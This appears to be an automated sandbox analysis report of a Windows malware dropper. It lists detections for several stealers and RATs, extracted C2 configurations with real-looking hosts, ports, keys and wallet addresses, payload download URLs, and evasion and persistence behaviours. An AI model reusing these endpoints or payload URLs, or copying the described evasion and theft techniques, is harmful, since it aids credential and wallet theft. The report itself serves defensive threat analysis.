Windows Analysis Report
wfJfUGeGT3.exe

Overview

General Information

Sample name:	wfJfUGeGT3.exe renamed because original name is a hash value
Original sample name:	046ebd7e0f619f33de609ea3f126b0d3.exe
Analysis ID:	1502163
MD5:	046ebd7e0f619f33de609ea3f126b0d3
SHA1:	37a0b634955eb29f9bc7d3d434838cd729bb7e17
SHA256:	bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555
Tags:	exeFormbook
Infos:

Detection

Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected Amadeys stealer DLL

Yara detected Cryptbot

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected XWorm

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the user directory

Drops certificate files (DER)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://thizx13vt.top/v	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpIq	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/g	Avira URL Cloud: Label: malware
Source: thizx13vt.top	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/j	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/x	Avira URL Cloud: Label: malware
Source: http://185.216.214.225/freedom.exe	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpM?	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top:80/v1/upload.phpraz	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.php%qN	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpsrJG	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/:F	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/2	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/)	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/E	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/F	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/S	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/N	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 31.3.build2.exe.2b60000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "193.176.158.185/B0kf3CbAbR/index.php", "Version": "4.41", "Install Folder": "fed0c9a4d3", "Install File": "Hkbsse.exe"}
Source: 3546345.exe.7096.37.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["POST13vt.top", "analforeverlovyu.top", "+#thizx13vt.top", "13vt.top", "thizx13vt.top", "t.top", "+thizx13vt.top"]}

Multi AV Scanner detection for domain / URL

Source: thizx13vt.top	Virustotal: Detection: 5%	Perma Link
Source: 95.179.163.21:29257	Virustotal: Detection: 8%	Perma Link
Source: http://185.216.214.225/freedom.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	ReversingLabs: Detection: 84%
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	ReversingLabs: Detection: 84%
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Windows.exe	ReversingLabs: Detection: 84%

Multi AV Scanner detection for submitted file

Source: wfJfUGeGT3.exe	ReversingLabs: Detection: 13%
Source: wfJfUGeGT3.exe	Virustotal: Detection: 13%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wfJfUGeGT3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: exonic-hacks.com
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: 1920
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: <123456789>
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: <Xwormmm>
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: NewAged
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: USB.exe
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: %Userprofile%
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: Windows.exe
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: bc1qvjral4f3vdvgp4ep5al5a08zxl3ympwr208tef
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: 0x8bF11EF53522Af8409ed77b05B1C5A0059F14571
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: TRC20_Address

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack

Uses 32bit PE files

Source: wfJfUGeGT3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: wfJfUGeGT3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_004062EB FindFirstFileW,FindClose,	0_2_004062EB
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CB1
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00614005
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061C2FF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0061494A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD14 FindFirstFileW,FindClose,	19_2_0061CD14
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0061CD9F
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F5D8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F735
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061FA36
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00613CE2
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC38B4 FindFirstFileExW,	24_2_00CC38B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007638B4 FindFirstFileExW,	27_2_007638B4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004415EE FindFirstFileExW,	31_2_004415EE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B31855 FindFirstFileExW,	31_2_02B31855

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: exonic-hacks.com
Source: Malware configuration extractor	IPs: 193.176.158.185
Source: Malware configuration extractor	URLs: POST13vt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: +#thizx13vt.top
Source: Malware configuration extractor	URLs: 13vt.top
Source: Malware configuration extractor	URLs: thizx13vt.top
Source: Malware configuration extractor	URLs: t.top
Source: Malware configuration extractor	URLs: +thizx13vt.top
Source: Malware configuration extractor	URLs: 95.179.163.21:29257

Yara detected Generic Downloader

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

19_2_006229BA

Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\jq equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\jq equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,jq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exe
Source: Cerker.exe, 00000022.00000003.3805623513.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.4037312002.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.4094207882.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3820865789.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3842369275.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exee
Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4190412440.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe
